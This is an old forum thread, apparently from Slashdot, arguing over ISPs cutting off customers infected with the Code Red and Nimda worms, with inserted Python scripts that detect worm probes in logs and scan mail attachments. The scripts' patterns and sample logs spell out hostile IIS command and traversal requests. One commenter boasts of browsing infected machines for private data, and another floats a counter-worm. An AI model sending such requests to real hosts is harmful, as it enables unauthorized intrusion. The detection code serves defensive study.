The ISPs are simply dictating that there be a reasonable level of responsibility enforced on the use of their network. If this means people have to pump millions into firewall hardware/software or if Microsoft has to patch their code, they really don't care. They are just protecting their "turf".
I think that what they are doing is a fantastic display of responsibility, forcing users to be responsible for their own activities, hardware and software.
That article you linked to offers a strange argument, that making a certain feature of the OS a little harder to get to (but not even close to difficult) is somehow security? Secondly, raw sockets don't violate the security of winXP in any way; if another computer can't handle badly formed network data coming in then that's a problem with the *other* system, not winXP. Thirdly, adding raw sockets is a very common add-on to windows and linux just to do these kinds of DoS attacks. Anyone who claims that keeping raw sockets somehow obscured is going to make any difference is living in a reality other than our own. Finally, they talk about how all winxp home boxes let programs run as "root" -- so what!? This is the same as win9x, macos, win2000 with users who run as administrator, and linux with users who run as root! Home users should have access to the entire functionality of their computer if they want to!
It's up to the operating system to be able to *handle* badly formed data, not other OSes to protect it from it! What happened to the dictum that "security through obscurity isn't security at all"? I bet if microsoft *removed* any raw sockets support we'd see a similar article saying how much they don't understand security, and how this won't solve any problems. Microsoft is always in the wrong. There's a huge double standard in the linux community.
I've read most of the posts and almost all of the comments are sound, but I think the problem is this.
.NET anyway when we'll all be "A Registered User" working for "A Company" in "Somewhere Road, Somewhereville, Somewhere, S0M3 WH3R3")
:-)
While we can't blame Microsoft for the problem not being addressed in a patch, and it's probably unreasonable to expect bug-free software (although a lot less would be nice), isn't the problem that although the patches are available, Joe End-User doesn't know anything about them?
To be fair, everyone here knows about new patches because they either subscribe to the security mailing lists or they read it on tech news sites. Joe E-U doesn't do either of these (and frankly doesn't care), so you could argue it's unfair to blame him for not patching his system (you could also argue that if he wants to swim in the web sea he'd better learn to swim and not use a lifejacket). Yes, the fixes are probably in the Windows Update thingy, but most users probably don't bother about that either (and a reminder probably won't work either, otherwise their AV would be up to date as well).
While I don't think this is fair on the ISPs, the only thing I can think of is each ISP mails all its users when patches come out (for any Windows OS; Mac users aside (and I'm not having a dig, I have a Mac too), I'd expect people running anything else to have a clue), has them for download on its own web site (coz the MS site is just a jungle) and has their tech support staff able to help install them. Add that these updates are required by the TOS and now there is no excuse for non-patching (and cue increasing ISP charges and lay-offs of all the 'script readers' who man the hell desks at the moment and really get on my wick when I'm trying to get to the bottom of a routing problem).
(tangent)
Doesn't it make you mad when you ring up to report a fault and they tell you there aren't any reported faults? Duh, what the hell am I doing if not reporting a fault? Someone's got to be the first!
(/tangent)
It's not viable to let MS email all the users because:
a. No one trusts them with their correct contact details (what good is
b. No one bothers to register anyway (and will only give out the mandatory Country info for the WPA crap once they realise that's all they have to)
c. The system would likely be insecure and someone would hack it for the details and/or send out spam/viruses
d. Did I hear someone say "shitloadsoftraffic"
Of course, it'll never happen, but I think blocking accounts is the right thing to do (tongue-in-cheek) after all, if Steve Gibson's right it'll only get worse when XP comes out (/tongue-in-cheek). There's no point sending emails; one of my clients had Nimda and you couldn't get out on the web at all through the scanning.
I pay for connectivity and bandwidth.
It's a good thing ISP's kick off the infected machines.
On the other side, people who have infected machines are not to blame; most of them have no clue what happens, nor do they know how to stop it or prevent this...
They will learn this way that the Internet is like a public road, and they need to follow some basic rules/driving lessons (like doing whatever possible to not spread viruses) to be allowed on the highway.
So, YES, KICK THEM OUT.
ISPs already prohibit use of their network that causes disruption of service for other customers. So all they're doing is simply enforcing the existing terms of service.
In this time of knee-jerk reactions to terrifying disasters, this warning seems richly appropriate.
...if ISPs could understand the significance of CodeRed and Nimda and use this as an opportunity to begin supporting and encouraging the use of alternate OSes like *BSD, Linux, Mac, etc?
No they should shut down everyone. They should have done this from the beginning. If you read the user agreement, it states that you are not allowed to run any servers. This is one way of enforcing the agreement. I personally do not like the agreement, but since I do not plan on running a server, I can live with it for now.
This has been the policy at my company for some time.
Power corrupts, absolute power corrupts absolutely; leaving one person (group) in charge is absolutely corrupt.
Could somebody please tell me how is it that all those people run IIS on their home box? I won't believe that they all bought Windows 2000 (or even NT). Most likely, they just borrowed a CD from their work place to have a free (as in "I stole your beer") operating system.
It's not friendly but I am very happy that those hypocrites have been cut off the Net. If they didn't want to pay for their OS, they should have gone for BeOS, Linux, *BSD and the like. They can only blame themselves and consider themselves lucky nobody is knocking at their door to ask them their Windows License number.
Lawyers out there........
For us non-MS users, who can be assumed to not have paid Microsoft and therefore not accepted a license agreement absolving them of all responsibility for the damage their systems do: do we not have a case for damages, since the behaviour of their appallingly insecure software (see gartner.com) is causing inconvenience and hardship (due to the general widespread effect upon the Internet) to ourselves?
Oh wait, look at Redhat, look at Debian, look at any other linux distribution. I guess, according to your logic, that linux developers also "don't care"?
If some piece of software contained a bug that the operator did not (and could not, I'm speaking generally here, not regarding the sendmail example) know about, then I would say it's entirely the creator of that piece of software's fault...
But as mentioned in the parent post, patches for the latest Microsoft worm exploits were available a few months to up to almost a year ago. And they were all right there for all to see on Windows Update. Your argument holds no water.
My provider, Videotron (cable access), is blocking any incoming request to port 80 from the outside. Consequently, my web site is no longer available but it was against the service agreement anyway, so I cannot complain. I still have access to any other services (I have a sshd running).
I got only 18 Nimda attempts yesterday, so I must admit that my ISP has taken an appropriate measure. They started doing that with Code Red and never removed this filter (and they must be very happy with that...).
I pay for DSL, I can run *WHATEVER* I want on it. Saying "tough beans" is a little short-sighted.
/. this week... NO CONTRACT SHOULD EVER LIMIT FUNDAMENTAL HUMAN RIGHTS.
If, on the other hand, they would like to have me charged (as in contact the RCMP or %your_local_federal_police%) for cracking I would 'understand'... the rule of law is always the highest order; to simply make endless arrays of rules in contracts and force people to abide by them (lest they go without (be martyrs)), then why have Law? Why have a Legislature? Corporate contracts for all manner of 'things' are creeping into every crack of life. These "contracts" force people to give up their rights in order to exist in a corporate controlled world... think I'm nuts? go read some of the EULAs discussed on
This isn't exactly a 'cut and dried' issue; these contracts basically allow arbitrary 'for the greater good' decisions to be made by the DSL providers... I know that their TOS probably say "no bandwidth hogging servers" but, when ALL DSL is provided under the same TOS, it becomes a method for DSL providers to make decisions about what I may - and may not - run on my box. I pay for bandwidth; allowing them to decide what data I may send and receive oversteps the bounds on my 'RIPE FOR ABUSE' meter.
Think of the censorship analogy: if they can censor some speech, then they are only an 'arbitrary decision' away from censoring *YOUR* speech. What's to stop them from saying "you cannot download streaming OGG because there is no publisher-protection scheme built in, and you may be violating copyright..."
Again, I may sound a bit unreasonable, or maybe paranoid. OBVIOUSLY I am not saying we want to allow these worms to run, but we must be wary of 'seemingly' reasonable decisions when made by 'powerful' (plutocratic) people.
What do you want to patch today?
I am inclined to agree. But does anyone have such a script?
Like Microsoft doesn't have enough money to repress an OS with an obvious and known security flaw... that, I DUNNO, caused a lot of traffic jams.
Yeah, if it was all about cost, then that was irresponsible, even by Microsoft's standards.
At our company, we get a lot of calls as it is where the customers think we are responsible for fixing their computers in the first place.
:)
This is ridiculous. They expect us to walk them step by step through how to find an antivirus program, install it, update it, scan the machine, and remove anything. We also frequently get calls where they expect us to walk them through an Ethernet card installation.
As much as I'd like to help out, we simply do not have the time and will not provide support for such things. Some of these people have a hard time finding the 'Start' button (I once pulled my hair out for 20 minutes trying to help someone find it, really).
Our policy has always been to contact everyone first, and temporarily disable it later. It's a great policy and I would fist fight anyone who would disagree.
Sometimes we send a system-wide email to our customers, but that does nothing but bog down our phones with people thinking we are going to spend 2 hours fixing their computer on the phone. It may be a crappy thing to do in some people's eyes, but if we are providing a good signal to their modem and it is online, that's all I can support (we do spend time on attempting every possible way for them to get their computer to pull an IP, but if it's jacked, there's not much we can do).
If you apply service pack 2 last to Windows 2000, it removes the protection of some previous patches.
They want to run this stupid MS Windoze OS, likely it's pirated anyhow (ever met someone who BOUGHT Windows? I haven't), and then they're also too cheap to keep up with paying for virus software to keep their ShitBox running. If everybody was forced to PAY for Windoze, and then they had to go out and BUY additional software so Windoze will continue to run, they'd all format and install Linux. I think the new XP is GREAT!!! The anti-piracy feature will surely get many to leave the dark side and join us in our quest for world domination. Shut them down and report them to the link below for piracy from MS.
I got this snippet from the free2air.org site. They were discussing a way to redirect anonymous 802.11 surfers to a central webserver.
# DNAT is only valid in the nat table's PREROUTING and OUTPUT chains, so the rule goes there, not in POSTROUTING
iptables -t nat -A PREROUTING -s 10.0.0.0/24 -d 143.207.0.0/16 -p tcp --dport 80 -j DNAT --to-destination 143.207.1.22
That would redirect anything from the 10.0.0.0 subnet on port 80 to the outside world 143.207.1.22 web server.
I don't think this would be very hard to modify. You would just have to identify who's infected. This is also not very hard.
-Me
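The redirect idea above only works once you know which customers are infected, and the Apache logs another poster mentions further up (hits on default.ida and /scripts/) are exactly where that information sits. What follows is an added example, not code from the free2air snippet or from anyone in this thread: it runs the two worms' probe signatures over constructed Apache log lines, keeps only sources inside the ISP's own netblock (anything from outside is someone else's customer), and builds the nat rules that steer each infected host's port-80 traffic to a notice page. The 10.0.0.0/24 netblock and the 143.207.1.22 notice server are reused from the snippet purely as placeholders.

```python
"""Pick worm-infected customers out of an Apache access log and emit quarantine rules.

Added example for this thread; not code from any poster.  The log lines below
are constructed, and the netblock and notice-server address are placeholders
borrowed from the free2air snippet.
"""
import ipaddress
import re
from collections import defaultdict

# Apache common log format: host ident user [time] "METHOD URI HTTP/x.y" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# Request URIs the two worms send while scanning.  Code Red hits the .ida ISAPI
# filter with a long run of N (or X) bytes; Nimda walks a list of root.exe and
# cmd.exe paths (the Code Red II backdoor and the IIS unicode traversal bugs).
SIGNATURES = (
    ("Code Red", re.compile(r"^/default\.ida\?[NX]{10,}", re.I)),
    ("Nimda", re.compile(r"/(?:scripts|msadc)/root\.exe\?/c\+dir", re.I)),
    ("Nimda", re.compile(r"/winnt/system32/cmd\.exe\?/c\+dir", re.I)),
)


def classify(uri):
    """Return the worm name a request URI matches, or None for ordinary traffic."""
    for worm, pattern in SIGNATURES:
        if pattern.search(uri):
            return worm
    return None


def parse_line(line):
    """Split one access-log line into fields; return None for lines that do not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def find_infected(lines, local_cidr):
    """Map source IP -> set of worm names seen, counting only sources inside local_cidr.

    An ISP only quarantines its own customers, so probes arriving from the
    outside world are skipped here.
    """
    local_net = ipaddress.ip_network(local_cidr)
    infected = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        worm = classify(rec["uri"])
        if worm is None:
            continue
        try:
            src = ipaddress.ip_address(rec["host"])
        except ValueError:  # a hostname rather than an address (HostnameLookups On)
            continue
        if src in local_net:
            infected[rec["host"]].add(worm)
    return dict(infected)


def quarantine_rules(infected, notice_server):
    """Build iptables nat rules sending an infected host's port-80 traffic to a notice page.

    DNAT is only valid in the nat table's PREROUTING and OUTPUT chains, so on the
    access router the rule belongs in PREROUTING, not POSTROUTING.
    """
    return [
        f"iptables -t nat -A PREROUTING -s {host} -p tcp --dport 80 "
        f"-j DNAT --to-destination {notice_server}:80"
        for host in sorted(infected, key=ipaddress.ip_address)
    ]


# Constructed sample: two customers probing us, one outsider, one clean request, one junk line.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:13:21:07 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282
10.0.0.5 - - [18/Sep/2001:13:21:08 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
10.0.0.9 - - [18/Sep/2001:13:25:41 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 282
10.0.0.12 - - [18/Sep/2001:13:30:00 -0400] "GET /index.html HTTP/1.1" 200 1043
198.51.100.7 - - [18/Sep/2001:13:31:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
this line is not a log record
"""

if __name__ == "__main__":
    hits = find_infected(SAMPLE_LOG.splitlines(), "10.0.0.0/24")
    for host, worms in sorted(hits.items()):
        print(f"{host}: {', '.join(sorted(worms))}")
    print("\n".join(quarantine_rules(hits, "143.207.1.22")))
```

Feed it the real access log and the ISP's customer netblock and the output is the list the support desk needs plus the rules to apply. The redirect catches the customer's browser as well as the worm's own scanning, which is the whole point: the next page the user loads is the notice, without their line going dark.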
Just a note to say that one of our local ISPs does the same thing to users known to be carrying viruses on their machines. My Better Half's machine was cut off from the Net, she had no idea why (she's not computer-savvy), and she only found out after calling the ISP's tech support. To their credit, they really helped fix the problem (infected Outlook Express, of course) to get her back on-line, then I finished the job with Norton antivirus software (which had to be updated before it could even find the virus; Kakworm, I think). I still have some problems with the ISP's rationale regarding the customer (shut 'em down and wait for their distress call) but I'm not sure they can realistically do anything else. The amount of infection they deal with is impressive, and they don't have the manpower to telephone so many people every week. They are open to a better solution: anyone have one?
shut down these bastards. they have no right running something like 2000 or IIS if they are not going to bother to take care of their boxes.
i was so pissed when i looked in my apache logs tuesday morning and saw the fucking virus creep through my class C. assholes....
This works for any upstream sessions that you initiate, and those downstream sessions that are controlled by e.g. TCP sliding windows.
Downstream bandwidth limits don't help much. If compromised nodes DDoS you from outside, the only thing that helps is to have packet filtering for sources that trigger the alarms, based on traffic patterns matching known attacks.
All this downstream packet processing loads your ISP's access router and may easily produce false alarms, filtering traffic that you want to have. Managing the access router filter on a case by case basis from your own node would increase the complexity of the system, so not feasible either.
Seems the ISP just has to cut the troublemakers out if it can, to attack the source of the problem.
There are three feasible alternatives which high-speed ISPs could take that I can see:
- Leave it alone, and maybe warn clients that they are infected. However, clients will probably get infected faster than they can fix their systems, especially those who don't even know what a web server is.
- Block incoming traffic on port 80 to all clients. Affects all of your clients, even those that are and will not be infected, and most likely gets you a bunch of angry users (which are those who know what they're doing anyway, the ones that ISPs like least).
- Temporarily disable access to the infected clients. You can be SURE you will hear from them VERY soon after their cable modem stops working. This also affects only clients that ARE infected, and is quite easy to automate. If the virus causes so many problems, then I think it's only fair that clients who have compromised systems be disconnected until they fix them.
I was a Videotron cable client until they started "handling" Code Red. Their solution was to suddenly block all incoming traffic to port 80 at their router, which, needless to say, is tough luck for my personal web server. I moved it to another port, but it took me a while to realize it was being blocked, since they did not inform anyone of their new restrictions. That measure has been "temporary" for nearly two months now, and the number of code red infected clients has not dropped. More recently they started blocking incoming traffic on port 25 to all of their cable clients, to "prevent clients from sending spam". That was the last straw, and I switched providers.
Taco - you're assaulting the victims of an external attack on a flawed operating system? Why isn't the ISP at fault then for failing to sniff for Code Plaid packets streaming across their connection?
The nation of Apache users would like to extend our deepest sympathy to citizens of Microsoft IIS. We deeply feel your pain at the loss of over 5000 of your webservers to suicide attacks by Nimda pilots.
Of course the fact that 80% of Nimda pilots were resident in your nation at the time of the attacks should be no reason for preventing you blaming foreign hackers and nuking them.....
When a Win98 or NT Workstation (not running IIS) gets infected via an exploited web site, does that workstation start broadcasting out? Or do the workstations just pass the .eml files over the network hoping to infect another IIS system?
I so tire of this whiny, my rights crap.
So do these people still have to pay for the access if the company won't let them use the internet? End user virus protection is not the only kind out there, they could protect themselves and other users by implementing some sort of protection on the network servers. Why don't they just block IIS? Isn't that the only thing affected by the virus? I don't think it's fair to just shut them off, that's the quick and easy thing to do but a "nicer" solution would be my preference.
This is (another) reason not to install any of the many scripts that have been circulating for taking special action against worm probes - like the scripts intended to be installed as /default.ida to do Code Red logging/reporting (or even retaliation). Plenty of ISPs are now scanning for vulnerable machines, and if you make your machine look vulnerable then you'll have a job convincing them to unlock your account.
I know someone who ended up in this situation, and despite his protests that he was actually running Apache and couldn't be vulnerable, the ISP insisted that he "reformat his computer". In the end he was forced to admit defeat (and lie that he'd done so).
On another note, I wonder if the worm blackholing program mentioned yesterday upsets the ISPs too...
In point c) you say you weren't infected, but in point b) you imply that your net access was cut off. If this is the case, the problem is not that DSL.net is cutting people off, it's that they made a mistake.
Because
A) it wastes bandwidth
B) everyone is responsible for security, even moron users who think their computer should be as easy to use as a VCR and never take care of it
C) it costs money to have this extra bandwidth used unnecessarily
Snippage from e-mail sent to me last night.(Note: I snipped info on how to fix worm, anti-virus software recommendations, and edited to get around filter):
Dear Speakeasy Members,
Over the last 3 months, we have been battling it out with the Code Red worm. Just as we were beginning to believe the worst was behind us, we have now learned that there is yet another hostile bit of rogue data coursing its way around the Internet.
This new so-called Nimda worm, unlike its Code Red predecessor, affects not only Windows 2000, NT and XP running IIS, but Windows 95, 98 and ME as well. It goes without saying that the damage potential for this worm is exponentially greater than the Code Red worm. It is for this reason we urge you to apply the proper fix to your machines ASAP, if you have not done so already.
PLEASE NOTE:
The effects of this worm are detrimental to all and we'd like to give each member a chance to secure their machines. However, after 9-23-01, Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any machine infected with the worm. We apologize for the inconvenience of this, but it is imperative that we ensure our network is not assisting in the propagation of this, or any, worm. All of us are part of a larger community, and it really isn't cool to infect your neighbors.
"Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. "
So you're saying that these same users would be fine with another OS because they would know how to patch them? Give me a break; low-end users won't know how to patch any OS. And I predict a higher percentage of viruses for Linux eventually: as it gains in popularity as a home OS, the virus-writing deviants will start targeting it more. Might be harder, but harder isn't impossible.
"FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer."
I'm not a Bush supporter, but shutting down households is kinda like shutting down nations that harbor terrorists?
or am I crazy? *yawns - just woke up after having very strange dreams*
Not only does IIS come bundled with 2000 (Pro and Server both), when you install Server it turns IIS, FTP, SMTP, etc. on by default. Many users may have installed 2000 Server and not realized that these were turned on. My company discovered this when the Code Red virus hit us. We had a bunch of file/COM+/SQL servers that had IIS running and didn't know it.
Microsoft did a stupid, stupid thing here.
Here's a question for the lawyers, or maybe someone at an ISP with a vested interest in the answer..
How do ISPs' actions in combating worms, blocking their customers, filtering other people's customers, affect their status as a common carrier? My understanding is a lot of the protections for ISPs in, say, the Computer Decency Act (for instance protecting against liability for copyright infringement by customers) are based in ISPs' status as a common carrier along the same lines as the phone company. If the ISPs start picking and choosing (even where it technologically makes sense; I don't want my web servers attacked by this junk), does that jeopardize their status? Does the fact that the worms are attacking the computer, attempting to install back doors, etc., mitigate the impact of the actions?
Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes.
Now, I hate Microsoft shtuff just as much as the next person and have found the answer is to use Linux, but Microsoft fixed these holes MONTHS ago. I am an avid reader of bugtraq and saw it come around way back. Then that patches were released. But NOBODY patched. And this is what they get. Some blame goes to Microsoft for outfitting their users with shit software, but they fixed it, so the majority of the blame goes to the stupid users IMO. Which makes it ok for the DSL provider to shut them down, yes. But lets make sure we know what we're talking about here before blasting others.
i work for a major webhosting company and when the first code-red wave hit our customer's unmanaged servers, we simply assisted them in locating information about patches, provided them with instructions, etc.
however, most of our customers basically ignored our repeated warnings to patch their servers properly and when nimda/blue worm hit our network in the past few days, we simply started shutting down servers. we had given them 2+ months and the patches required to fix these issues had been released by M$ for almost a year. if shutting our customers down is the only way we can raise awareness about these issues, then so be it. we have tried to help them and they just ignore us.
i give up.
IANAL, this may be true in the US, but I SUSPECT in the UK that Microsoft may fall prey to "fit for purpose sold" clause in UK law. If I explicitly told the MS salesperson that I wanted secure web server and they assured me that it was, I am entitled to a refund, OR FOR THEM TO FIX IT, at no charge. This would rule out subscription based patching of servers, they could however refuse to patch, charge customers for their "new" version (i.e. Win 3.11 Vs Win 3.1) that just happens to have the problems fixed.
The real disgrace is that ISPs don't install virus scanning software in their mail servers.
There are a variety of such packages available, and they would stop most of the viruses which are spread via email.
I haven't seen anyone taking the ISPs to task for this so far, and I think now is the time to start demanding that they install it!
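As an added example of the kind of check a mail server could run (not anything from this thread or from any ISP's real setup): Nimda's mail copies arrived as a readme.exe attachment declared as audio/x-wav, so a client willing to play audio inline would execute it on preview. The scanner below walks every MIME part of a message, refuses attachments with executable extensions, and flags any part whose declared inline-playable type disagrees with its filename. Both sample messages are constructed; the first only copies the shape of the carrier mail, not its payload.

```python
"""Flag mail carrying executables disguised with a playable MIME type.

Added example for this thread; not code from any poster or ISP.  The two
messages below are constructed: NIMDA_STYLE has the shape of Nimda's carrier
mail (readme.exe declared as audio/x-wav), BENIGN is a plain text attachment.
"""
import email
import mimetypes
import os

# Extensions Windows will execute (or, for .eml, hand straight to the mail client) on open.
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".eml"}

# Major types a mail client is prepared to render or play inline without asking.
INLINE_MAJORS = {"audio", "video", "image"}


def check_part(filename, content_type):
    """Return (filename, content_type, reason) if the attachment looks dangerous, else None."""
    ext = os.path.splitext(filename)[1].lower()
    if ext in EXEC_EXTS:
        return (filename, content_type, "executable-extension")
    major = content_type.split("/", 1)[0]
    guessed, _ = mimetypes.guess_type(filename)
    if major in INLINE_MAJORS and guessed and guessed.split("/", 1)[0] != major:
        # Declared as something the client plays inline, but the name says otherwise.
        return (filename, content_type, "mime-type-mismatch")
    return None


def scan_message(raw):
    """Walk every leaf MIME part of a raw RFC 822 message and collect dangerous attachments."""
    msg = email.message_from_string(raw)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        # get_filename() falls back to the Content-Type name= parameter when there
        # is no Content-Disposition header, which is how Nimda's attachment was named.
        filename = part.get_filename()
        if not filename:
            continue
        hit = check_part(filename, part.get_content_type())
        if hit:
            findings.append(hit)
    return findings


NIMDA_STYLE = """\
From: someone@example.com
To: you@example.net
Subject: (none)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="====_ABC1234567890DEF_===="

--====_ABC1234567890DEF_====
Content-Type: text/html; charset="iso-8859-1"

<HTML></HTML>
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAA
--====_ABC1234567890DEF_====--
"""

BENIGN = """\
From: friend@example.com
To: you@example.net
Subject: notes
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="zzz"

--zzz
Content-Type: text/plain

see attached
--zzz
Content-Type: text/plain; name="notes.txt"
Content-Disposition: attachment; filename="notes.txt"

just some notes
--zzz--
"""

if __name__ == "__main__":
    for label, raw in (("nimda-style", NIMDA_STYLE), ("benign", BENIGN)):
        print(label, scan_message(raw))
```

The extension check is the one that matters for this worm; the type-mismatch check is there because the trick generalises to any payload the sender can talk the client into opening without a prompt. A real filter would sit in front of the mail store (a milter or a content filter hook) and either strip the part or bounce the message, and it still needs a signature scanner behind it for attachments that are not executables at all.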
Using a computer is a lot like driving a car, from the point of view of responsibility taken. A normal PC is like some family wagon: relatively cheap, quick and quite safe. Running a web-server is a lot like driving an 18-wheeler.
A person who runs a web server has to defend himself from all the security risks that he might face, exactly in the same way as a truck driver has to maintain his brake system. Of course, one can get along driving a truck without tuning it at all, but then what can protect him from wet slopes in stormy weather?
Lots of people install a web server either because they don't bother to look at what they install, or because they think it cool. But web servers are not children's toys; if people aren't aware of the harm they're causing, they must be stopped.
I live in Israel. In the last few days I've been getting quite a lot of internal ISP traffic bound to my port 80 (luckily I run Apache and a firewall). Many of the people from whose IPs (dial-up!) I've been getting connections haven't even bothered to shut down their FTP servers (which were of course MS-FTP). Those morons deserve to be thrown out.
The Internet is a peer-to-peer system where one peer can piss in the public pool.
Hmm, that's a pretty good argument for shutting down Napster, Gnutella et al.
You just can't help yourself. You finally managed to write something completely neutral and you got excited and let your signature anti-Microsoft remark slip by.
Now wait for the backlash from all the users that think they have a God-given right to run a server off their broadband connection. As for myself I run webservers (yes, Microsoft webservers, bite me) but I've got a firewall and I block everything, so these are for my own consumption.
My God. Today is truly a day that will live in infamy. I know many of you are wary of yahoo links, but this is the real thing.
25,000 dead in Boston... oh, the humanity. After today I would be willing to give up just about any freedoms, as long as it would thwart monsters like these.
Well DUH! Helping people is really nice, but if you'd read the article, the point is that the ISP's haven't been able to get in touch with people! The intent here is NOT to slap people around for being stupid, but to get their attention!! This sh-t has been going on for months now. I say it's about time the ISP's get proactive and start forcing people to wake up and clean up their systems!!!
You are absolutely correct. I've been running IIS without any extra security, but properly patched, and have watched in amazement as my colleagues shut down their computer and "have to work from home" when they get infected.
Meanwhile, my server is still up, happily rejecting attacks and logging them on a page for me. I've been attacked more than 5000 times by 650 unique servers... it's slowed down to 100 attacks an hour, but for a while there. Yeesh.
One note of caution: Right now, The only complete fix is to format your machine and reinstall the software, then the patch, while offline. People are getting reinfected within 30-60 seconds where I work.
I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying.
I hope this is a troll, but I fear it is not.
If I leave the fence to my pool open, and my neighbor's kid walks in, falls into the pool, and drowns himself, I am liable not only for civil but also for criminal damages. If my dog gets loose and injures someone, I am also liable. Why, then, if my computer damages others' machines on the internet, should I not be liable for damages?
What I think needs to happen is this: Any owner of an infected netblock needs to be assessed a charge if their computers damage or disrupt traffic on the Internet. The fines should be commensurate with the amount of damage caused. If I'm a major ISP and I own a large netblock that's affected (even if I sell parts of that netblock off), it should be my responsibility to track down the sources of that disturbance within my network and eradicate it, otherwise I should be punished.
I no longer have any tolerance whatsoever for lazy or complacent admins; fines may finally force people to wake the fuck up and secure their goddamned machines and their networks. I mean, come on! Nimda exploits holes in Windows NT and 2000 that are over six months old, and it's done a pretty damned good job of showing me that there are plenty of clueless admins out there! These admins need to be dealt with, they're making life hard for the rest of us.
You call it nannying. I call it being responsible.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Not true. Nimda can propagate via drive shares to a fully-patched machine. Now, granted, putting open shares on the net is stupid. But, I can assure you that at least some of the corporate LANs that are getting thrashed 'cause of this are getting hurt *most* because of the shares propagation.
What if the ISP is responsible for giving the end users the virus? Should they start knocking off users they infected? My University's high traffic webmail servers have been trying to get my Mozilla browser to download readme.exe or readme.eml for three days now (perhaps no one has mentioned a patch to the admins??). A huge percentage of the campus is infected/re-infected daily, and our servers are still dishing this thing out! It would be pretty hypocritical for them to block users even after they patch their system considering their role in the mess.
Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS
Taco,
I generally look forward to your little comments appended to user submissions. However this is out of line. MS, regardless of how many people hate them, has released a patch for this. It's the users who have the problem. Not that MS is blameless, but calm down before you flame.
I know I'm going to get flamed for this, but Linux has its own security holes too, with plenty of script kiddies out there attempting to exploit them and root your system. The only difference is that the average sysadmin stays on top of things like this.
If 90% of users ran Linux, worms would be written to hit them, and the MS proponents over at seecolon.org would be laughing it up, whining about how Linus doesn't do enough QA, even though it's the users' fault.
As for shutting down broadband users who have the worm, this is pretty much the only thing you can do. You can't block outgoing traffic to port 80, or they would never be able to download any patches. They should turn them on for a temporary basis after they complain, say for 1 day, and give them the appropriate information to clean their system and install defenses. These guys are on broadband, so they can easily download any patch.
Anyway, that's enough ranting for me. Just remember, while MS is not blameless, think before you start flaming them.
Captain_Frisk
To use the same vulnerabilities as the worm to shut down the IIS servers of the infected machines.. just set it to activate a few hours later so it can propagate before it burns out.
I mean, it won't affect those who have kept up to date, and those who haven't been affected yet, soon will be.
snort + ipchains/iptablez = solution
I'd like to see both Apple and Microsoft expand on this in the future to allow for software updates through an easy to use standalone application. I'd also like to see third party developers get access to the software update systems, so they can offer patches to the users (or at least links to websites with patches).
The Microsoft system is pretty sad, and the closest thing I've seen to the Mac OS update system is cNet's Catchup. But we're still stuck with downloading and applying patches manually.
People with an infectious disease are quarantined. Should they be let out in public just because they are not trained in medicine? Because it is not their fault, and they were just visiting their grand children when they became infected?
The same thing applies here: infected machines need to be quarantined, *especially* if the operators are not trained in administering them properly. And the minimum level of training should be "let Windows Update run periodically."
Leprosy can be cured in a few days with modern medicine. Worms and viruses can be cured in less than that with modern software. So use it, don't spread the problem around.
"Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes."
1- Microsoft has already added a firewall into Windows XP, allowing users to block attackers.
2- Microsoft had patches for these exploits up months ago, for free. Internet Explorer semi-regularly forwards Windows users to an automatic website update that explains they need to patch their OS to install patches that fix problems, including security issues. It is not their fault that the users are directed right to an automated patch utility and CHOOSE TO IGNORE IT ANYWAY!
I would pay extra if my cable provider offered a service to detach my machine from the net once it was obviously compromised.
Sure, if I'm at home in front of the console I might be willing to live with a gaping back door while I'm struggling with isolating the exploit. But most of the time I'm asleep or at work and I don't want my zombified machine out on the 'net getting into trouble.
give credit where credit is due, please.
--
"It is now safe to switch off your computer."
Just for fun, I sometimes browse or nmap the IP addresses the end up in my log from infected machines. With a nimba URL it's fun to browse their boxes for porn and "sensitive" information!
One of the IPs I went to was a "consultancy" that proudly displayed their Microsoft and Cisco certification and a list of retarded services they offer. All done up in FrontPage, of course.
Now, these folks knew how to drum up business -- they had carefully indicated their (Toronto area) phone number in several places, but they didn't have an email address anywhere on the page.
Considering that the rawest beginners usually figure out how to use email (even badly), you'd think a telephone number would be an alternative means of communication for someone offering "PC advice".
On top of that, how am I supposed to email them my sarcastic opinions?
-- clvrmnky
Why not have a server with a cleaning program on...
Before you register for NTL the only webpage you can access is the registration page, can't they do similar for this?
~www.devnull.co.uk
